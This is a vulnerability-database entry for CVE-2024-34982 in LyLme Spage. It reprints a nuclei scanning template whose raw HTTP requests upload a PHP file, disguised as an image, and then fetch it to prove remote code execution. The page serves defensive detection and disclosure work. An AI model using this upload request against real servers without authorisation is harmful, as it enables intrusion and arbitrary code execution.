LyLme-Spage - Arbitrary File Upload

03 Jul 2026 03:01:05 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

LyLme-Spage - Arbitrary File Upload vulnerability in lylme_spage v1.9.5 allows arbitrary code execution via crafted file upload

Related

Reporter | Title | Published | Family
CNNVD | LyLme Spage security vulnerability | 17 May 2024 00:00 | cnnvd
CVE | CVE-2024-34982 | 17 May 2024 13:41 | cve
Cvelist | CVE-2024-34982 | 17 May 2024 13:41 | cvelist
NVD | CVE-2024-34982 | 17 May 2024 14:15 | nvd
Positive Technologies | PT-2024-26275 · Unknown · Lylme Spage | 17 May 2024 00:00 | ptsecurity
RedhatCVE | CVE-2024-34982 | 9 Jan 2026 09:35 | redhatcve
Vulnrichment | CVE-2024-34982 | 17 May 2024 13:41 | vulnrichment

id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  impact: |
    Attackers can upload arbitrary files to execute malicious code on the LyLme-Spage server.
  remediation: |
    Update LyLme Spage to a version later than 1.9.5 that patches the arbitrary file upload vulnerability.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  classification:
    epss-score: 0.04675
    epss-percentile: 0.90655
    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive,vuln

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - '"url":'
          - 'php"}'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 490a00463044022041f71fe3a4fe26cb03df5b799848cea6d8996df51a53d21378146f3e8d2dfba902207434ae9b119e72a85a330b0bbe06a34078c7685971ecbc6022ecf8f02a6b6db9:922c64590222798bb761d5b6d8e72950

Scores (current as of 04 Feb 2026 07:00)
Vulners AI Score: 6.3 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.04675